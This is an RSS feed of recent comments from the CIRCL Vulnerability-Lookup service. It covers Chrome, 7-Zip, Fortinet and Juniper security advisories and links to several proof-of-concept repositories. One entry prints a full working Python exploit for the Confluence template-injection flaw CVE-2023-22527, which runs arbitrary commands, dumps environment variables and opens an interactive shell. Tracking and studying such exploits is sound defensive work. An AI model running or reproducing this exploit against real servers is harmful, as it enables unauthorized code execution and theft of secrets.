Feed: Most recent comment (https://cve.circl.lu/comments/feed)
Generator: Vulnerability-Lookup (info@circl.lu), python-feedgen
Updated: 2025-02-22T13:58:43.184906+00:00
Contains only the 10 most recent comments.

Comment: Stable Channel Update for Desktop Tuesday, January 7, 2025
URL: https://cve.circl.lu/comment/277659d5-c63c-4885-a40f-c84aa253dad8
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.195613+00:00

The Stable channel has been updated to 131.0.6778.264/.265 for Windows, Mac and 131.0.6778.264 for Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the Log.
Security Fixes and Rewards
Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.
This update includes 4 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information.
[383356864](https://issues.chromium.org/issues/383356864) High CVE-2025-0291: Type Confusion in V8. Reported by Popax21 on 2024-12-11
We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. As usual, our ongoing internal security work was responsible for a wide range of fixes:
- [388088544] Various fixes from internal audits, fuzzing and other initiatives
Many of our security bugs are detected using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.
Reference: [https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html](https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html)

Published: 2025-01-08T07:56:13.906692+00:00

Comment: CVE-2023-4047 PoC By Wild Pointer
URL: https://cve.circl.lu/comment/714ff721-cfd1-4d52-8dd7-18df34e59ed5
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.195502+00:00

- [https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)

Published: 2025-01-17T21:26:39.418096+00:00

Comment: POC for CVE-2023-22527 (Confluence SSTI) - Struts2
URL: https://cve.circl.lu/comment/a58dda1d-0763-4d89-ad38-22d86eb55d6a
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.195382+00:00

~~~python
import requests
import argparse


class exploit:
    def __init__(self, url):
        self.url = url

    def rce(self, cmd='', header='Ret-rce'):
        # Form body posted to the Velocity template endpoint; the command output
        # is written into the response body ahead of the normal HTML page.
        data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\n'
        r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers={
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': str(len(data))
        })
        # Everything before the page's DOCTYPE is the command output
        return r.text.split('<!DOCTYPE html>')[0].strip()

    def get_env(self):
        return self.rce(cmd='env')

    def shell(self):
        print('[DEBUG] Spawning semi-interactive shell ..')
        while 1:
            cmd = input('$ ')
            result = self.rce(cmd)
            print(result)


def parse_args():
    parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')
    parser.add_argument("-u", dest="url", type=str, required=False, help="Url")
    parser.add_argument("-c", dest="command", type=str, required=False, default=None, help="Command")
    parser.add_argument("-e", dest="env", action="store_true", required=False, default=False, help="Get environment vars")
    parser.add_argument("-i", dest="interactive", action="store_true", required=False, default=False, help="Interactive mode")
    return parser.parse_args()


def main(args):
    if args.command is None and not args.env and not args.interactive:
        print('[ERROR] Please provide a command using -c option')
        return
    exp = exploit(url=args.url)
    if args.env:
        res = exp.get_env()
        print(res)
    if args.command:
        res = exp.rce(args.command)
        print(res)
    if args.interactive:
        exp.shell()


if __name__ == '__main__':
    args = parse_args()
    main(args=args)
~~~

Published: 2025-01-17T21:29:08.826577+00:00

Comment: PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit
URL: https://cve.circl.lu/comment/aea0fc6c-fa3d-4e98-aef1-a25b364fb2fe
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.195250+00:00

[Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit](https://github.com/synacktiv/CVE-2024-43468)
Published: 2025-01-21T15:32:07.384792+00:00

Comment: 7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives
URL: https://cve.circl.lu/comment/ffe0aeca-4687-4168-a295-b0334927e4c5
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.195121+00:00

~~~
24.09 2024-11-29
-------------------------
- The default dictionary size values for LZMA/LZMA2 compression methods were increased:
         dictionary size            compression level
      v24.08    v24.09    v24.09
                32-bit    64-bit
        8 MB     16 MB     16 MB    -mx4
       16 MB     32 MB     32 MB    -mx5 : Normal
       32 MB     64 MB     64 MB    -mx6
       32 MB     64 MB    128 MB    -mx7 : Maximum
       64 MB     64 MB    256 MB    -mx8
       64 MB     64 MB    256 MB    -mx9 : Ultra
  The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.
- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.
- APM and HFS support was improved.
- If an archive update operation uses a temporary archive folder and
  the archive is moved to the destination folder, 7-Zip shows the progress of moving
  the archive file, as this operation can take a long time if the archive is large.
- The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream
  for extracted files from nested archives (if there is open archive inside another open archive).
- Some bugs were fixed.
~~~
[https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/](https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/)

Published: 2025-01-23T07:14:02.895881+00:00

Comment: PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).
URL: https://cve.circl.lu/comment/4479dea7-72fb-4d91-90f4-95ffec3e0310
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.194993+00:00

- [PoC Tested on AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).](https://github.com/google/security-research/tree/master/pocs/cpus/entrysign)
We've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5.

Published: 2025-02-05T07:31:30.100378+00:00

Comment: Clarification from Fortinet
URL: https://cve.circl.lu/comment/c2248f9d-e2e0-4af2-a57c-e3b393cffb55
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.194837+00:00

UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.
Furthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.
It appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.
We have updated this previous toot, changed the title of our article, and added an update to prevent confusion.
Ref: https://infosec.exchange/@BleepingComputer/113986777248862223

Published: 2025-02-12T05:40:06.836557+00:00

Comment: Fortinet Clarification
URL: https://cve.circl.lu/comment/cae05d8f-677d-4f75-9a64-811c17a16d2d
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.194679+00:00

UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.
Furthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.
It appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.
We have updated this previous toot, changed the title of our article, and added an update to prevent confusion.
Ref: https://infosec.exchange/@BleepingComputer/113986777248862223

Published: 2025-02-12T05:40:36.908353+00:00

Comment: securityonline.info - Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291
URL: https://cve.circl.lu/comment/83590ea9-dd4d-4b41-a332-1519809ad219
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.194479+00:00

# Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291
Ref: [https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/](https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/)
Google has just released a critical security update for its Chrome web browser, addressing a high-severity vulnerability that could leave users open to attack. The update, rolling out to Windows, Mac, and Linux users over the next few days, patches a “Type Confusion” flaw in V8, the JavaScript engine that powers Chrome.
This vulnerability, tracked as CVE-2025-0291, was discovered by security researcher Popax21 and reported to Google on December 11th, 2024. Type Confusion vulnerabilities are particularly dangerous as they can allow attackers to execute malicious code on a user’s system. This can lead to a range of consequences, from data theft and system crashes to complete takeover of the affected device. Google has awarded a bounty of $55,000 to Popax21 for the discovery and responsible disclosure of the bug.
Type Confusion vulnerabilities occur when a program mistakenly treats data as a different type than originally intended. In the context of V8, this can lead to out-of-bounds memory access, allowing attackers to manipulate memory, crash the browser, or execute arbitrary code. Such vulnerabilities are often exploited in sophisticated attacks, making their timely resolution critical for user safety.
Google urges all users to update their Chrome browsers to the latest version (131.0.6778.264/.265 for Windows and Mac, 131.0.6778.264 for Linux) as soon as possible. Here’s how:
1. **Open Chrome.**
2. **Click the three vertical dots** in the top right corner.
3. Go to **Help > About Google Chrome.**
4. Chrome will automatically **check for updates** and install the latest version.
5. **Relaunch Chrome** to complete the update.
Published: 2025-02-12T06:52:50.539121+00:00

Comment: 2025-02: Out-of-Cycle Security Bulletin: Session Smart Router, Session Smart Conductor, WAN Assurance Router: API Authentication Bypass Vulnerability (CVE-2025-21589)
URL: https://cve.circl.lu/comment/b45703d4-11a4-4f18-a2f4-8929ea2f08d2
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Updated: 2025-02-22T13:58:43.192356+00:00

This issue affects Session Smart Router, Session Smart Conductor, WAN Assurance Managed Router.
Severity: Critical

Severity Assessment (CVSS) Score:
CVSS v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) SEVERITY:CRITICAL
CVSS v4.0: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) SEVERITY:CRITICAL

Problem

An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based attacker to bypass authentication and take administrative control of the device.

This issue affects Session Smart Router:
- from 5.6.7 before 5.6.17,
- from 6.0.8,
- from 6.1 before 6.1.12-lts,
- from 6.2 before 6.2.8-lts,
- from 6.3 before 6.3.3-r2;

This issue affects Session Smart Conductor:
- from 5.6.7 before 5.6.17,
- from 6.0.8,
- from 6.1 before 6.1.12-lts,
- from 6.2 before 6.2.8-lts,
- from 6.3 before 6.3.3-r2;

This issue affects WAN Assurance Managed Routers:
- from 5.6.7 before 5.6.17,
- from 6.0.8,
- from 6.1 before 6.1.12-lts,
- from 6.2 before 6.2.8-lts,
- from 6.3 before 6.3.3-r2.

Juniper SIRT is not aware of any malicious exploitation of this vulnerability.

This issue was found during internal product security testing or research.
Solution
The following software releases have been updated to resolve this issue:
Session Smart Router: SSR-5.6.17, SSR-6.1.12-lts, SSR-6.2.8-lts, SSR-6.3.3-r2 and subsequent releases.
It is suggested to upgrade all affected systems to one of these versions of software. In a Conductor-managed deployment, it is sufficient to upgrade only the Conductor nodes and the fix will be applied automatically to all connected routers. As practical, the routers should still be upgraded to a fixed version; however, they will not be vulnerable once they connect to an upgraded Conductor. Router patching can be confirmed once the router reaches the "running" (on 6.2 and earlier) or "synchronized" (on 6.3+) state on the Conductor.
This vulnerability has been patched automatically on devices that operate with WAN Assurance (where configuration is also managed) connected to the Mist Cloud. As practical, the routers should still be upgraded to a version containing the fix.
It is important to note that when the fix is applied automatically on routers managed by a Conductor or on WAN assurance, it will have no impact on data-plane functions of the router. The application of the fix is non-disruptive to production traffic. There may be a momentary downtime (less than 30 seconds) to the web-based management and APIs.
This issue is being tracked as I95-59677.
Note: Juniper SIRT's policy is not to evaluate releases which are beyond End of Engineering (EOE) or End of Life (EOL).
Workaround
There are no known workarounds for this issue.
Severity Assessment
Information for how Juniper Networks uses CVSS can be found at KB 16446 "Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories."
Modification History
2024-02-11: Initial Publication
Related Information
KB16613: Overview of the Juniper Networks SIRT Quarterly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories
Report a Security Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
Published: 2025-02-19T16:52:08.947558+00:00